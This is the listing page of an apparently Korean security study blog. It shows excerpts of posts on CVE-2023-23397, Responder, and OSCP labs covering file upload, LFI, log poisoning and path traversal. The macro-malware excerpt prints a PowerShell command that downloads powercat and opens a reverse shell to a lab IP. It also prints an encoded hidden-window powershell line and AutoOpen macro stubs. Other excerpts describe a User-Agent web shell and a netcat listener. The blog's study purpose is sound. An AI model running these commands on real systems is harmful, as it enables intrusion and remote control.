본문 바로가기
  • Tried. Failed. Logged.
728x90

분류 전체보기739

java.security.cert.certpathvalidatorexception trust anchor for certification 에러 ISRG Root X1 혹인 ISRG Root X2 .pem 파일 설치https://letsencrypt.org/certificates/ Chains of TrustThis page describes all of the current and relevant historical Certification Authorities operated by Let’s Encrypt. Note that a CA is most correctly thought of as a key and a name: any given CA may be represented by multiple certificates which all contailetsencrypt.org출처: https://github.com/TeamNewPipe/Ne.. 2025. 8. 13.
모든 인코딩 디코딩 문자 확인 사이트(dencode.com) https://dencode.com/ DenCode | Encoding & Decoding Online ToolsEncoding and Decoding site. e.g. HTML Escape / URL Encoding / Base64 / MD5 / SHA-1 / CRC32 / and many other String, Number, DateTime, Color, Hash formats!dencode.com 2025. 8. 5.
블랙베리 - bar 설치 관련 링크 BAR 파일 설치 프로그램https://github.com/xsacha/Sachesi GitHub - xsacha/Sachesi: Firmware, extractor, searcher and installer for Blackberry 10Firmware, extractor, searcher and installer for Blackberry 10 - xsacha/Sachesigithub.com 터미널 앱(term-48) 아카이브 주소https://archive.org/details/term-48_bb10 2025. 7. 30.
취약점 분석 - CVE-2023-23397 CVE-2023-23397 취약점 정보CVE-2023-23397는 Microsoft Windows 전용 Outlook에 약속을 알려주는 ‘미리 알림’ 기능에 재생할 사운드 파일을 불러오기 위해서 공격자의 SMB 서버로 인증하는 과정에 NTLM 자격 증명을 탈취되는 권한 상승 취약점입니다.해당 취약점을 이용하여 권한 상승이 이루어져 더 큰 피해가 발생할 수 있을 정도로 위험도는 다소 높을 것으로 예상됩니다.조치 방안으로 Outlook을 Build 16130.20306 이상으로 업데이트가 필요하며, SMB 서비스를 이용하지 않을 경우에는 해당 서비스를 비활성화 하거나 SMB TCP/445 포트 아웃바운드를 차단합니다.CVE Number CVE-2023-23397CVSS Score9.8severity(심각도).. 2025. 7. 27.
취약점 분석 - NTLM 크리덴셜 패킷 스니퍼 (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com 사용 예시... 2025. 7. 27.
악성코드 분석 - 매크로 문서 악성 파일 IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')청크화(문자열이 너무 길면 오류가 발생) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26.
OSCP - 9.3.2. Using Non-Executable Files 파일 업로드 시 실행이 불가능한 경우(e.g. 실행 권한이 없는 업로드 폴더)에 사용할 수 있는 취약점 분석 방법을 알아본다. 우선 파일 업로드 시 filename에 매개변수를 조작하여 ../../../../../../../test.txt를 넣어 서버로 전달한 경우 서버 측이 정상 응답을 한 경우 취약 가능성이 있을 수 있다. 특히 여기에 루트(/) 경로임에도 정상 업로드 된 것이라면 root의 홈디렉터리도 직접 접근이 가능함을 알 수 있다. kali@kali:~$ ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileupEnter passphras.. 2025. 7. 22.
OSCP - 9.2.2. PHP Wrappers admin.php 파일 내용kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance. 다음과 같이 LFI가 발생하는 경우(입력 검증 없이 바로 include 실행 => include $_GET["page"];)PHP Wrappers에 취약할 수 있다. admin.php 페이지 base64 인코딩(php://filter)kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resourc.. 2025. 7. 21.
OSCP - 9.2. File Inclusion Vulnerabilities, Labs Local File Inclusion (LFI) 및 access.log 포이즈닝 취약점 access.log 포이즈닝(오염)User-Agent 헤더에 한줄 짜리 웹쉘 코드를 넣는다. 이후 서버로 부터 요청이 가게 되면 서버 측에 아파치 로그 파일인 /var/log/apache2/access.log(윈도우 예시: C:\xampp\apache\logs\access.log)에는 사용자의 방문 정보(아이피 주소, 경로, User-Agent)가 남게 된다. 이제 LFI 취약점이 있는 파라미터에다 /var/log/apache2/access.log를 입력을 해 파일을 읽어 오게 되면서 해당 PHP 코드가 실행되면서 원격 코드 실행 취약이 발생한다. (*cmd 파라미터 앞에는 ?가 아닌 &이 올 것) nc -nvlp 4444좀 더 원활한 제어를 위한 경우 공격자는 리버스쉘을 열어 대상 서버가 연결을.. 2025. 7. 21.
OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is 취약점 개요Grafana 8.x 버전에서 발생 하는 Path Traversal 취약점이다. 플러그인 API 엔드포인트의 경로에 대한 사용자 입력에 대한 검증이 미흡하여 서비스 영역 외의 상위 디렉터리 등에 액세스가 가능하게 된다. 문제의 코드 : https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284 참고https://github.com/taythebot/CVE-2021-43798 GitHub - taythebot/CVE-2021-43798: CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)CVE-2021-43798 - Grafan.. 2025. 7. 21.
시스템 보안 - 해시(MD5, SHA1, SHA256) 확인 사이트 모음 해시 식별 https://hashes.com/en/tools/hash_identifier Hash Type Identifier - Identify unknown hashesIdentify and detect unknown hashes using this tool. This page will tell you what type of hash a given string is. If you want to attempt to Decrypt them, click this link instead. Decrypt Hasheshashes.com 해시 복호화 https://hashes.com/en/decrypt/hash Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256.. 2025. 7. 18.
Oracle DB - 사용자 권한 및 테이블 확인 쿼리문 --현재 사용자 확인 SQL: SELECT USER FROM DUAL;-- 세션 사용자 확인:SELECT SYS_CONTEXT('USERENV','SESSION_USER') FROM DUAL;-- 권한 확인:SELECT * FROM SESSION_PRIVS;-- DBA 여부 확인:SELECT * FROM USER_ROLE_PRIVS;-- 테이블 목록 확인SELECT table_name FROM user_tables; 2025. 7. 17.
728x90